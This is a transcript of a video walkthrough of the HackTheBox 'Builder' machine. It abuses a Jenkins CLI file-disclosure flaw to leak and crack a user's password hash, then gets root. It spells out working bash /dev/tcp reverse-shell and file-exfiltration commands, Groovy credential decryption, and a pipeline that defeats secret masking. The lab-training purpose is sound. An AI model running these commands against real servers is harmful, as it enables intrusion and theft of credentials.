What's going on YouTube? This is Ipsec. I'm doing Builder from HackTheBox, which is a non-competitive release that focuses around the latest Jenkins vulnerability in the command line interface, and it is a file disclosure vulnerability. We'll abuse this in order to leak a hash password of a user, crack it, and then use that to log into Jenkins. Some basic configuration was done to enable CI/CD pipelines, and that configuration was pretty much configuring the runner, which executes code, and storing a SSH private key in the Jenkins credential object. First, we'll just use Groovy to decrypt it and get the SSH key, which then lets us get to root. But you don't really learn all that much on exactly what a CI/CD pipeline is by doing it that way. So we'll also create some malicious CI/CD pipelines to leak the key so you can understand exactly how it's used and learn a little bit more about that. So with all that being said, let's just jump in. As always, we're going to start off with an nmap, so -sc for default scripts, sv enumerate versions, oa output all formats, put in the nmap directory and call it builder, then the IP address of 10.10.11.10. This can take some time to run, so I've already ran it. Looking at the results, we have just two ports open, the first one being SSH on port 22, and its banner tells us it's Ubuntu server. We also have HTTP on port 8080. Its banner tells us it's Jetty, which is like a Java web server. It's version 10.0.18, but the title tells us it's a Jenkins box. So let's go take a look at the web server. So I'm going to go to 10.10.11.10 on port 8080. And we get the welcome to Jenkins thing. And Jenkins is really helpful. It's telling us the version right here at 2.4.4.1. If we Google this, like just 2.4.4.1, the second result currently is the security advisory from January 24th. So if we look at the security advisory, it's going to say the Jenkins has a built-in command line interface, the CLI, to access Jenkins from a script or shell environment. It uses the args4j library to parse commands, and the command parser has a feature that replaces character followed by a file path in the argument with the file contents. So this essentially enables us the ability to read files off the server. So let's go take a look at the command line interface to see how to exactly access this. And it does have a downloading the client, and it says the client can be downloaded, here it is, at the Jenkins URL, then jnlp jars/Jenkins CLI. So let's take a look at this. I'm going to wget 10.10.11.10 port 8080, and then we're going to run this jar, so java-jar Jenkins CLI. And looking at this, let's see. We want -s and then URL. So I'm guessing S stands for server. We can see the first option right here, the server URL. So let's do -s http 10.10.11.10 port 8080. And if we gave it a command, like something that doesn't exist, it's going to say no such command. And based upon the description of the CVE, my first thought when it says this, no such command, is the server responded with no command, and then our CLI.jar put this string in. That's not what happens, right? The server is responding with this entire string. So it's kind of like a server-side template injection, but not kind of. If we put in a file path here, etc passwd, the CVE says it's going to process this, but it's going to treat it as a file and give us the contents back. And we got no such command like this. So maybe the CLI jar is doing exactly what we think this way. I'm going to do a sudo Wireshark, and let's just inspect this real quick because I'm curious. The answer is we have to run a command, right? So if we took any of the commands, if I just ran a -h or help, I think help actually sends it to the server. So if we do help etc passwd, we do get a line out of it, right? So let's look at ton0 real quick. And I want to run the first thing, ASD DSA. So if we look at this, we go here, where's follow TCP stream, and the server does respond with that whole string. So my first thought is, when we did that help, did the server respond with the entire file? And then our Jenkins CLI jar just showed us the first line? Or did the server respond with just the one line, right? So let's do this again. I'm going to continue without saving. I'm going to run this. We're going to follow the stream again. That's not what we want. Let's exit this. I want it to do TCP. And we only get one line of this. If we kept reading the CVE, I don't think it specifically says different commands can give different amounts of line. Right here it's saying attackers with overall read permission can read entire files. Without that permission, we can only read the first few lines. It does say lines, and help only got one. If we tried other commands, like connect-node is another command, we'll see we get more data back. So how do we find connect node? I didn't find much information online. OXDF and I were playing with this a little bit, and I think the easiest way is kind of just scripting it out. I'm going to use a lot of ugly bash foo to do this, right? So what I want to do first is run the Jenkins CLI. So let's do this again. And if I say help, we're going to get a list of everything. So what I want is just get every command here. So I'm going to do a awk command. And then a little known feature of awk, it can also do grep. So I'm going to do search for a slash, and then like this is going to say regular expression. I'm going to do 2 spaces, and then A to Z for character. And if we do this, we just get everything there because a lot of times help actually writes to standard error. So we're only doing awk against standard out. We want to pipe standard error to standard out like that. And now the awk command will work, right? So the next thing we want to do is a print on the first match. And that will just get us this text. It's not, by default, the separator's a space, I believe so, or a tab. So now we have just a list of commands. So what we can do next is pipe that over to a while read, and then we put the variable we want. I'm going to do CMD, and then we say do echo CMD like that, done. And I'll say ipsec like this, so you can kind of see what we're doing. So we have a loop, and now we have all the commands. So here we can do another java-jar Jenkins CLI, and then we have the command, and then I want to say /etc passwd like that, right? That looks fine. If I run this, oh, it's still doing echo. Let's get rid of the echo. And something really odd is going to happen. Well, we have to specify the server. So we'll do -s in this. And now something odd is going to happen. It stops after the very first thing. And I can't really explain this. If we do like an strace to see how it exits, it doesn't really tell us much. We got a few text thing here. I don't know exactly what this means, but something with this Java command is breaking out of our loop, and it is bizarre. I'll show a way to bypass that in a second, but if I just echo this, we get all the files there. I'm going to pipe it to, we'll just say run.sh. And then if I bash to run this, we can see it keeps going. So it's only breaking out of the loop, not breaking out of the bash command altogether. There we go. We have a command with a lot of things. Now, Control-C it. This is also weird. If I don't run it to a file, if I just do, hey, let's pipe this, and after every line, we execute bash, right? Well, it's still going to exit. I can't explain that. It is so weird. But you could also like pipe it to true so it never exits with anything other than 0. And you hope that would work, but it doesn't. It will exit after the first one. OXDF has a video specifically on this that goes over a lot more things that just fail. The one thing I did find that works is if we go over and pipe this over, or not pipe, but run this with bin sh, and we just do this, it's still going to exit. And even if we did like a pipe true here, let's try that, exit. After the bin sh command, pipe it over to true. It still does that. If we straced this, we can see this SH will exit with 0, which makes you think, oh, it exited with 3 there. Wonder if I pipe it here, if it will exit with 0. Not that it really matters. Yeah, we can see it exited with 0, but still only went 1. So what's the answer? It's not doing any of that true thing. But if init bin sh, we just background it, it will work, hopefully. And I don't get hit with demo gods. There we go. So I think it works because so much output. Wow. Because we queue up all the commands to run before the loop hits the second thing. That's my guess at what happened there. So that works. What we want to do now is get better output, right? So the way to do that is, let's just say echo-n. I'm going to do, actually, instead of echo, let's do printf. And then we can say cmd, and then \t for tab. Then we run this command. And I just did the printf because it's easier to put the \t for tab in place. So we're going to run this. We're going to have to say 2, 0, 1 like that. And let's see, what's the easiest way to wc-l this? I wonder if we can just do it here. Because I want to get the line count. I think this may work. No, that definitely did not. Control C. Oh, well, it kind of is. It kind of worked. So let's move the printf real quick. We'll do that do bin sh -c, and I'll put the printf here. cmd like that. Shoot. Do there we go. That is not working as I expect. It's kind of cool though. We're getting all the lines. Where are we screwing up? I think I need to just make this into a script because putting this all on one line, oh man, that is confusing me. So let's simplify it. So we have this, we while read do. Okay. Then we can say done. This doesn't really help me that much, but hey, let's see. Where did we mess up? I wonder if we can do the printf out here. So we'll do cmd, tab like that. And then instead of putting the and there, we will put it like that. So now what I'm doing is I'm backgrounding this Jenkins command and then running the wc-l on the bin sh command instead of on the Java command itself. I think that may still like leave this sh open while this is backgrounded and get me the lines, I think. Let's try this. Bash run. And yes, it does. Sweet. So that seemed to have fixed the problem. So we got now every command that's running and then the number of lines that is outputted. So we're just looking for the highest one. And we see connect node 21 right there. We also have like delete job, delete node, delete view. I wouldn't recommend trying these. I mean, it may work, but everything with delete, disconnect, like if something wrong happens, I don't want to like cause an outage, right? Connect seems to be a relatively safe word, right? Import credentials is 7, but you get the gist of exactly what we're doing here, right? And pretty fun bash scripting lesson. Offline node, again, that sounds dangerous. Online node, probably safer. Reload job, that would probably be a safe one to do, but let's just let this finish and then we can do connect node, right? Actually, let's just let it go. The next thing we want to do is figure out what file we can access on Jenkins. And looking into Jenkins a lot in the past, I know it's typically not like relying on a database or OAuth or things like that. I think it can, but the default is storing things by file. And you have to understand all the Jenkins file paths. And you could probably find enough research online, but might as well just do a Docker pull down to download Jenkins. And you could just Google like install Jenkins Docker or something like that and get that command. But I don't think it's a stretch to just remember, oh, I want to pull from the Jenkins repository and the Jenkins Docker, right? And the reason why I love Docker so much is it's going to let me replicate the environment really fast. Like we can install Jenkins without looking at any install instructions. I can just do a Docker run. I'll say RM so it deletes this container after it runs it. We want to do -d for detach. And then Jenkins, I want to say. There we go. So now we're running the container. And if I do a Docker logs d4cd, I just grab the first 4 out of that hash, we can see it's set up. I forgot to map the port 8080 to my local host, but we can still access the Docker through its Docker IP. The initial password is here. So maybe the first thing I would try is, let's see, connect node to see if this initial password thing exists still. And it says no such file. Another thing you could test out is like seeing if you can read directories. You can't. So let's do a Docker inspect. So if I do Docker inspect on this container, if I type it correctly, we can see its IP is 172.17.02. So I can just go here, and then we want to get the initial password of this. And then let's just set up Jenkins real quick. So let's just install suggested plugins, and it's going to go ahead and download everything to set it up. And once it has set up, we can probably drop into a shell. Let's see, is there anything else I want to talk about while it does that? I don't think so. What was the last command I ran? I guess if it was in a non-standard location, you could like go in the proc self environ, and this will show where it's running out of probably. So we can see the host name. This is going to be a Docker container. That's the Jenkins update repo. There is the home directory right there. Home directory var Jenkins home. So we can see a lot of information there. It is still downloading, but almost done. So once it finishes, it'll take us to the next step. I probably shouldn't have bothered installing plugins because it just takes a little bit of time, but I think we are good. Come on. The last 0% is always the longest. So let's create a username. I'm going to do ipsec, the password of password, and then we'll give it an email address of root@ipsec.rocks. Save and continue. Yep. And we can start using Jenkins. So ours looks very similar, except we have a slightly higher version. If you wanted to, you could look at the Docker pull command to specify the 2441 version, but we don't have to worry about that. I'm going to do Docker PS. So let's do Docker exec, IT, interactive terminal, D4CD. Again, you just to give the partial of the hash, and I think you need 4 characters. Maybe it's 3. I like doing 4. And then I'm just going to execute sh. And now we're in this Docker. So I'm going to do a find dot dash name ipsec, which is my user. Nothing here. Let's see. Let's do find dot, and I'm going to give it wildcards. And there, we can see my username is var Jenkins home users. So if we looked in here, so this is where Jenkins installed. We just have a bunch of things. There is a secret key, which we could also use. I think this key is going to be used to encrypt various strings. But the home, it was in what? Users? And there's ipsec. So if I do ipsec here, we have a config.xml. If I cat this, we see there is a password hash and it's JBcrypt, so probably Java bcrypt because this looks like a bcrypt hash. So this probably exists on the server. Now, the directory is ipsec and then this random character, right? We have to figure out how we can find this directory. Well, up one in this users directory, there is a users.xml. And if I cat that, it says ipsec is here. So we have a way to look at the users installed in the box and also grab the hash. Let's make sure we can crack this. So I'm going to go over to the Kraken, which is just a box on my network. I don't like cracking hashes on the same computer I'm doing recording on because cracking is CPU intensive, right? So I'm going to create a word list, hashes, not word list, and I'll call this Jenkins, put it here, and let's just see if it can crack it, right? Let's see, we specify the hash file and then word list. It's been a while since I've cracked anything, but it should auto detect this as bcrypt and then attempt to crack it. And the reason why I'm doing my password first, because I know my password is just password. So this will definitely crack if we have the right option. So let's try 3200 because we don't have any salt or anything like that. If I wanted to be even faster, I can make a word list of just the word password and then try to crack it that way because it won't try anything other than that one thing. So now that it's running, we see it recovered 1 out of 1. So we have a successful crack. So let's go back to the server and we want to do this. Let's see. I guess we can just say Java jar Jenkins CLI -s HTTP 10.10.11.10.80.80 connect node. And then we want to go proc self environ. What was the directory? We have to specify at like that. And it is var Jenkins home. So var Jenkins _ home and get rid of Wireshark. And then users, was it users.xml or user.xml? users.xml. So we read this file and let's see, we have Jennifer and this directory. So if I go into users and then go here, let's go users ipsec and it's config.xml. We can read her file and we see we have the password hash right here. So I'm going to grab this. I'm going to go back over to the Kraken. The hashes Jenkins. I'm going to throw in this hash now and attempt to crack this again. It should start much quicker because I think it's got all the drivers cached or whatever it does at first. So come on. It's going to initialize and start cracking. It shouldn't take too long to crack it. There we go. Recovered 2 out of 2. I could scroll up or I can just say, is it -- show? Yep. We can see the password is princess. So the Jennifer username, we know it's Jennifer because it says it there. The password is princess. So let's make sure we go to the server's thing, 10.10.11, not our local Jenkins, right? And we can log in with Jennifer and then princess. And here we go. We're inside of Jenkins now. So the first thing I would do is go over to manage Jenkins. If we looked at like the plugins installed, let's see, system tools, plugins, we can see what's enabled potentially installed. So Bouncy Castle, I think that's SSL stuff, credentials. There's a lot. Let's just go look around. The first thing I would ever do on a Jenkins instance, and I guess we can show that real quick. You don't have to do it here, but if you go to the bottom, there is a script console. And this is groovy. You can just get command execution right here. So if we did print line, and then what is the next thing? I think it's the command. We'll say who am I, and then we just say dot execute, and then we want the text out of that. And then we run this, and you have command execution, right? We're Jenkins. If we did lsla, we can see it is indeed a Docker environment. And we can get a shell here as well, but there's other things you can look at before you do that. So if we go back into manage Jenkins, a really good thing now with all the hype of CI/CD pipelines is looking at the credentials. And we can see there is a global credential. Let's see, I clicked the wrong thing. System. Maybe I clicked the right thing. Go here, global credential. There we go. We have SSH username with private key, root. If I click this and go to update, we can see the key is concealed for confidentiality, but we can do the super hacker thing and view source. And then I look right here and we can see we got the key right here. Now it is going to be encrypted. I think I got everything. Yep. I'll just control X so I cut it. I just want to make sure there weren't like other characters there. That's why I use cut instead of copy. But I've copied the key out of this private key variable. And again, if they didn't do this, I mean, we have code execution on this groovy thing. It's stored in files, so I'm sure we could just get a reverse shell and find that file, right? But if we look at this file, let's say cred.stuff, or we'll say B64. Paste it. Let's get rid of the curly braces. Base64-D on this. And it's junk. It is encrypted, probably with that secret key we saw earlier. But if you went and did any Googling, you discover there is, of course, a Jenkins library that lets you decrypt it. And that command is executable via Groovy scripting language. So we can just call the Jenkins decrypt function, which is Hudson util secret with a capital S decrypt, and then give it the secret. And we want to do the second parenthesis because we're in print and we're in the decrypt. We run this, and here we go. We have the SSH key. So we could just grab it this way. So if I do now v key.id RSA maybe, paste chmod 600 sh-i. The name was root, so I'm going to try root 10.10.11.10. Let's accept this, and we're in. Boom. That is the root. I forgot one thing early on in this box. If I was trying to go for like bloods or things like that, soon as I saw the proc self environment when I had this file read, I would have targeted user.txt here. So if I went var Jenkins home, so we can copy that. Maybe we can say user.txt, and we get the flag there for user. There's other things we could be showing. Let's see. I'm going to get a shell in this box, and let's see if that was actually where it exists on a file, right? So I already have the cred in a base64. So let's do bash-c, bash-i, dev tcp 10.10 14.8 0 and 1, like that. Boom. Dot execute. And we don't, I guess we can do dot text. We don't need it because we don't care about the text output, but that should be fine. Let's make sure we're listening. Run. We don't have a shell. 10.10.14.8, that is my IP. Did it not like all this redirection? Or maybe it doesn't have bash on the container? Let's see. Run. No. Let's which bash? It's got bash. I wonder if it doesn't like all the pipes. Let's see. echo-n, bash-i, dev tcp 10.10.14.8, 9001, 0 and 1. Base 64. Let's get rid of special characters. I don't think we have to, but I think if I do that and that, there's another one there. There we go. Pure alphanumeric. I hate having any special characters in that. Echo, base 64-d, bash. Run. Is our execute command wrong? No. Bizarre. Curl 10.10.14.8, 9001. Okay, that works. Let's see. -o, temp, shell.sh, make dir dub v shell sh, bash-c, bash-i, dev tcp 10.10.14.8, 9001. That looks good. Python 3, HTTP server. Okay. So now we're going to download shell.sh, and then I'm going to execute it afterwards. So we have it downloading. I should just be able to do bash shell.sh. Run. There we go. We got a shell. So it did not like special characters. It probably didn't like the pipe in that command. So that's a way around that, right? Python 3-c import pty spawn bin bash. Shoot. Script -q. Is it dev null bash? There we go. Script bash. Is it -o? Dev null bash. Let's just do script bash. Permission denied. There we go. So now I can do st2i raw minus echo. And I should have tab autocomplete and stuff. Maybe not. Now I do. Sweet. Export term equal x term. It's not the best because my output of every command I'm being ran is now on this server. There are flags you can do in the script command, but I forgot them off the top of my head. So we'll just run with it. We want to go to var Jenkins home, and I wanted to grab that one thing. Is it credentials.xml? Is that really it? Is it going to be that easy? It is. Sweet. We didn't have to grep it. That's where that file is. So if you just read credentials.xml, there's a chance of us grabbing the key, but maybe we don't have enough buffer to actually read that with connect node. Java jar Jenkins CLI 10.10.11.10 connect node, and then var Jenkins home credentials.xml. And we give it the @ so it reads that. That didn't work because we didn't specify port 8080. It does read the whole private key. So I'm sure there's a way we could decrypt it without ever logging in, right? Let's say maybe we couldn't crack Jennifer's password. This is an alternative way. I'd look at grabbing the key and then looking at that secret and then decrypting it locally. I'm thinking, I wonder if we could easily do that. Try and think of some easy way to do this. I'm going to try something. No, I'm not. I was like, I could just download this file, then run it locally, but it's going to be a bit tough to do that. Let's see. I bet I can do this. So I'm going to docker kill d4cd. It sucks because I told this Docker to delete itself after it runs, right? So we no longer have that container. Sad day. Let's do docker run -it. Well, yeah, we can just do docker run Jenkins. We want to make sure it's -deed. There we go. Docker compose logs 178d. We're not in compose, docker logs. There we go. We have the initial password. Let's set this up again. And then while it's setting up, I can show a different way we could have. I'll just pause the video when it sets up. So we just do one thing at once. Jenkins is running, put in the password. Install. I should have selected that. I'm going to pause the video. We'll resume when this is done. Okay, so now I can just give the name. Let's do ipsec password ipsec root at ipsec.rocks. Save and continue. Save and finish. So now we have Jenkins. I did that, so now we can stop this container. Or before we stop it, let's do docker run it 178d sh. Docker exec is what I want. And then var Jenkins home v credentials dot, or we want secret.key. Apt install vim. Cat secret.key. So the only thing in this file is the key. So we can just overwrite this. So let's go back here. And we want to go and extract secret key. I didn't specify 8080 in this command. So if I copy this, and then we echo this string over top of secret key, then we're going to stop and restart this container so it restarts Jenkins. So we'll do docker stop 178 was it? There we go. Docker run 178. Shoot, how do I? Docker ps-a docker run 178d. See, if I just say Jenkins, is it going to start a new container? It did. I don't want that. B225. Let's see. Docker start container by ID. Let's see. Docker run -dti. I tried that, I thought. Docker run ti. This. :Jenkins. Something is wrong. Docker exec. No. Maybe it's restart. There we go. That's it. Restart. So now we have the Jenkins container running, and this has our secret key that we just put off the server, right? So if I log in here, let's log in with ipsec password. And then once we're logged in, we can go to manage Jenkins, or I could just type /script at the top because that's the URL for it. But we can go to Script Console. And now let us grab the private key from this. The key.crypt, I guess I'll call it. Paste. Cat this. Xclip. Selection. Primary. That's not it. Clipboard. Sweet. So now we want to do the print line. Then Hudson util secret decrypt. Run. And it still did not decrypt it. That's a shame. So we did not get the right secret, I guess. Docker run it 178d sh. Docker exec is what I wanted. Var Jenkins home secret dot key bc. Ooh, hold on a second. Cat secret key. There's no line break. There's a line break here. I wonder if it read the \n. So let's do echo -n to secret.key. There we go. That looks better. So we got rid of the line break. I bet we have to restart Jenkins, right? We can't just do run. So let's do the restart command again. Now when I run this, it's probably going to want me to log in again or something. No val. Whoa, that was a weird error. Okay. Yep. Wants us to log in. IPsec password. Don't save. There we go. Still did not decrypt it. So that's not where it stores that. It ends in 5B. Let's just make sure. Yep, that is it. So how does it store this? I guess we could make sure our command is right. Yes, it is. So if our secret was correct, where it's ever pulling from, we would be able to decrypt it. Because on the server it's that, on a local host it's not. Let's just try Googling this. And does anyone have anything how it works? A script for decrypting it. This will probably tell us all the files we need. So credentials.xml, secrets master.key. We don't have this one. So we could grab this key. And we could also get this through the file disclosure vulnerability, but I've already proven that, I think. So this will just be quicker. cd secrets, then echo -n to master key. And then we wanted to grab also cat secrets, then the Hudson. Ooh, that'll actually be hard to grab because that's not base 64 or not like printable. There's a lot of characters there that I probably just can't read, right? So maybe you won't be able to grab this. This will be interesting. Let's try this. Var Jenkins home, secrets, Hudson util secret. Yeah, it's really questioning, like, can I grab all these characters? Let's see. I'm going to paste this, go to XXD. Man, this is going to be tougher than I expected. If we pipe that to XXD, no such agent. I think this is going to be how we have to grab it. This is ugly. Wow. Let's see. We want to grab everything after agent. I know an easy way to do this, or semi-easy. So we'll direct this to a file, secret, I guess. XXD. Is it -p to just put all the hex? It is. -r is it going to do one line? I forget exactly how to do it one line, but we won't worry about that right now. XXD-p, we'll call it hex. Man, ASCII. We want probably 22 or 34 or 42. Is it 42? I don't think that's it. What was it? We want the hex. 22. Okay. So we want to delete everything here. And then here. So what I did was I piped all the output over to hex. And then what we did was deleted everything before and after the quote. So now we just have a big hex string. Because the reason why we did that, we get rid of this. We wanted to grab the data between this. So now I can cat hex, then xxd-r-p, and we just get the string. So we can say this is, where's the file name we want? Hudson util secret. Okay. I'm going to do a docker cp Hudson util secret in 178d var Jenkins home secrets. Boom. That looks good. If I md5 sum Hudson util secret ACF ends in BB. ACF ends in BB. Okay. Restart the container. Copy this. We're going to have to log in again. And this time we should be able to decrypt it. And again, if you're confused what we're doing, I just wanted to be able to decrypt this key without having to log into the Jenkins box, right? It's kind of like my beyond root thinking. The only reason I was able to get code execution and decrypt it was I could crack Jennifer's password. So I'm thinking if I couldn't crack Jennifer's password, what would I do? And it would be this. Input length must be, ooh, we screwed something up, right? I wonder what we have screwed up. That's looking more promising. var Jenkins home. We probably have a line break where we shouldn't. So MD5 some secret key there, 4E231. MD5 some secret key, 4E231. The master key, 5B74. B74, ACFBB, that's different. That sucks. Huh. I wonder where we screwed this up. Ends in EQ, like that. JOWK. Ours is completely different. So I guess it's how we extracted it, right? And why? It kind of looks the same. That is bizarre. If I go here, let's see, where did we screw up? Hudson util secret. Let's just copy it to dev TCP 10.10.14.8 9001 and nc lvnp 9001 server Hudson. We'll say server.secret. And again, I haven't done this before the video, so you're seeing me play with this live. You can probably just go to the end of the video if you want the solution. I really am curious. So let's xxd on, we called it Hudson util secret, and xxd server secret like that. Oh, it's going to be a pain to see. It looks similar, right? We end in 4Y. There's just some extra characters, I believe. Maybe better if we split it the other way. Okay, so 26EF, and they do 8C. So we do have some changes right off the bat. 2479, 2479, then 9DD1. Like, something is just screwed up at the beginning. So there's some characters I just guess it can't display. Which is a shame, because I really thought this would work when I piped it over to XXD. Because there's no way if I just copy it like this, it grabs all the characters. No way, and nope, that didn't do it. I don't know if there's a way we can grab this then, which is actually good, because if we can't grab this key, then the exploit's dead, right? I highly doubt we can pipe this over to base 64. Yeah. We can't do that. We could base 64 the command, right? Or we can just say pipe it to out, v out. Let's say errors to out. So this eliminated a need for XXD. I guess we did overcomplicate that one piece. XXD out less. We still have some characters. I don't know where this BFBD comes from. And then we got EFBF, BDD1. Let's see. Yeah, there's some characters that just gets clobbered. Like that 8C is not here. So I think we're out of luck, right? I don't know if there's a way we can grab that. But for curiosity's sake, if we did manage to grab this, so we can do a docker cp this into a container, 178d, was it var Jenkins home secrets Hudson util secret? Is that it? I think that was it. We can do a restart. We'll have to log in again. And hopefully after we have this one secret thing, we can decrypt it. We can run. And there we go. That is the missing piece. So we just have to find out a better way to exfil this file through that file disclosure. Don't know it, but I'm sure that maybe there's research out there for other ways we could go pull that file, right? So the last thing I want to try real quick is just intercepting this in Burp Suite. Mainly because maybe the Jenkins CLI tool is doing something weird with the text when it's trying to display to me. So if I can see it on the wire, I can then compare it to see what it looks like, right? So if we run the same command, and this time I'm going to go in the Java, I'm going to do -d HTTP proxy host is equal to 127.0.0.1. And then we also have to specify the proxy port, which is 8080. This will send it over to Burp Suite. And then we can run through each of the requests. We see it's going to WebSockets. We have it now requesting the file. If I go to WebSocket history, we hopefully see the response. I don't. There we go. Here's the response. Let's see. How do we, if I send this over to repeater, is there a quick way to show this in hex? Oh, here it is. And let's see, it begins right here. 26EF. I think this BFBD, that was not in what I'm expecting. XXD, this. Head -1. Yeah, I see 268C, then 2479. We have 26, and that does some weird encoding thing. So we have to figure out the encoding issue where it's doing all of this. I'm guessing it's just like some weird byte that's getting translated because we keep seeing this BFBD. Not sure exactly what it is, but I don't know how to fix that. Maybe we could try other methods. Maybe connect node isn't a good one. We could do maybe, was it reload job is another one. We could see exactly how that behaves if that looks the same. I want to say it was reload job. We run this. Let's go back over to proxy on raw, reload, send the file, send all those parameters. This looks pretty much the same. Yeah, we have BFBD. So not sure what's going on there. Let's just go over to the Jenkins pipeline. And you want to make sure this build executor status is idle. If there's an error here, this next step won't work. But most Jenkins, you'll see it. Let's go to new item, pipeline. I'm going to create a pipeline called ipsec. And then just give it a description. And here we have the pipeline script. So if we just went like Jenkins example pipeline SSH, you can probably find a quick example here. How do I use the Jenkins SSH pipeline? And it kind of gives an example here. Let's see, is there a better one? I think we'll have to do a little more than this, but we can try this real quick. We got stage deploy. The credentials, I'm just going to say pull the very first credentials. And to do that, we can say credentials 1, like that. And then we want to say root at 10.10.11.10 as the IP. And I'm going to say cat/root SSH ID RSA. Like that. We can get rid of these commands. If I do save, will this actually start deploying? So I'm going to click build now. Failed. We can see that. I'm trying to get why it failed. Console output. Let's see. Expecting found. Okay, so we have an error in our pipeline. Dashboards ipsec. Let's edit this pipeline real quick. Where is it? Pipeline syntax. That's not what we want. Configure. Okay, let's see. I don't know what I was doing there. There we go. So that looks better. Save. Build. Build scheduled. This one failed as well. Let's see, what does this say? Output. No such method steps. So if we went in the Jenkins documentation, we'd see the full pipeline thing. I'm just going to delete build 2. I don't feel like clicking confirm. Let's get back here. So this is just kind of the heart, right? Before you have the stage, you have to specify pipeline. So we can say pipeline, and then say run this on any agent. And then we can do that. And I think that's all we need. So we have pipeline. We probably need to say stages, because you can have multiple stages. This is like deploying. You can have like a test stage, things like that. So pipeline, stages, stage, steps, the SS agent plugin. Save that. Build. And this will be running code on the Jenkins box. We see it is complete. So if we go to build 3 and look at the output, we will see our SSH key. There it is. So we're not dumping the decrypted key in Jenkins. What we're doing is using that decrypted key, then SSHing to a box and grabbing it, because on the box it is also decrypted. I bet we could do something cute like, let's see. If we go back to configure, let's see. I wonder if we can assign a variable. Let's see. Jenkins pipeline, assign variable, and print. Let's see. I wonder if I just printed it. steps. If I do a print credentials, one like this, is this going to work? There's probably some way you can do this just in case like you can't access something and you want to get the runner. They've tried print line. It should be print line space server, like that. Did they say a semicolon? They don't. Let's try this. Build now. It says complete and success. Go to console output. See echo. We just printed that. So that did not do what I expected. There's got to be a way to do this. Maybe it's like this. Build. I'm guessing this is going to fail. It did. So I think I'm going to do a little more research. If not, that's going to conclude the video. Hope you guys enjoyed it, but we'll see if I go on and figure out the solution off recording. Okay, so you can see I'm now at build 24. It took me a while to figure this out, but I'm glad I did because I understand Jenkins pipelines a lot more than before I started, right? To get started, I'm going to just open a file. This is similar to the pipeline. The mistake I was making kind of is treating this as a variable, but really SSH agent is a plugin. And that plugin is running a command and is just taking this as a variable and going to the first credential. If you Google around, you can see SSH agent in order to pull that credential is really doing something like this. It's using this with credentials thing. And when I first read this post, I was confused, like, because we have with credentials and it's saying username, password. But if we went to like Jenkins with credentials and looked at it, we got the credentials binding plugin. And let's see, it gives examples of other things. So we have like a get username password. There's a SSH user private key. You can see the variables. You have credential ID key variable. And this was like my key to understanding what happened. So let's look at my pipeline. And this is going to be the working one. I do want to show one thing, because the first thing I tried, let me copy this on my clipboard so I don't lose it. Paste, nope, not that. There we go. Definitely don't want to lose this. So what we have is we're going to the deploy stage, we're running the script, we're going to set the key var to null, then we're going to run the with credential, we're going to capture the key var, and then echo it, right? And the whole reason I'm doing this is because when we're in this with credential block, it's going to sanitize things, right? So if I tried just a, let's do echo SSH key. So how this is working is we do with credential, we're saying the SSH private key, credential ID 1. If I went into Jenkins, manage Jenkins, we've seen this before. Go to credentials. This is the ID I want to capture, ID 1, right? So that's where I got that. And then we're outputting that credential to this key file variable. Okay, so if I save this and run it, it's going to complete, but it's not going to complete how I want it to. So if I build this, we have this. There we go. A secret is passed to echo using groovy string, which is insecure. Masking. So I think it masked the value here and also gave us a warning. So my next step was, okay, I'm going to do what that one Stack Overflow said and pass this SSH key to the key var and then print it out. So we're not inside of this with credential. And my logic is hopefully at that point, the masking won't take effect, right? So I can do key var is equal to this, and then we can echo key var like that. Then when we save, build, I'm pretty sure it's going to complete, but I'm not going to get the key. So I have this, success, console output, and we can see it printed this string. So at that point, I ran this a few times and saw this UUID always changed. So I couldn't just like use the LFI, or not LFI, the file disclosure to grab that file. So my thought was, okay, let's just put a cat command there, right? So we go back to the pipeline. We can say, I want to say SH cat like that. We gotta put cat in the quote. I think this is what I did. So that's running the shell command to cat the file, and that's running it on the runner. So we're not making that SSH connection. And we have a failure. What is this failure? It's probably going to be file not found, hopefully, as long as I did that correctly. Yeah, no such file or directory, because this UUID is changing. So what happened here? Let's get back to the pipeline. Configure, because Jenkins is trying to do this securely, right? So we're in this with credentials object. The SSH key variable, this is pointed towards a file, and we export it. And then when we leave this with credential function or method, whatever you want to call it, it deleted the file. So now when we tried to cat it, we could not, right? So then I moved the sh command up here. So we could say keyvar is equal to cat SSH key. And then if we echo key var like that, save, build, it should be completed and we'll actually get the key. So we have a warning here. It's saying you did something really dangerous and stupid, but if we go to console output, it still lets us see it. It still ran it, and the masking did not take effect. So that's how you could do this pipeline if you couldn't just SSH to a box. Maybe you're using actual user credentials and they updated the credentials, so those didn't work, but you still wanted the old ones. You could print it out doing something like this, right? So that is a bit of pipelines. Hope you guys enjoyed it. Take care, and I will see you all next time.